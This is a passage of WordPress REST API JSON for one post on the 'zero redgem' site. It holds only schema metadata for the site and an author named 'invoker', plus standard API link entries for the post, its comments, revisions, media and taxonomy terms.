redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/3807","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3807"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/3807\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3807"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3807"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3807"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}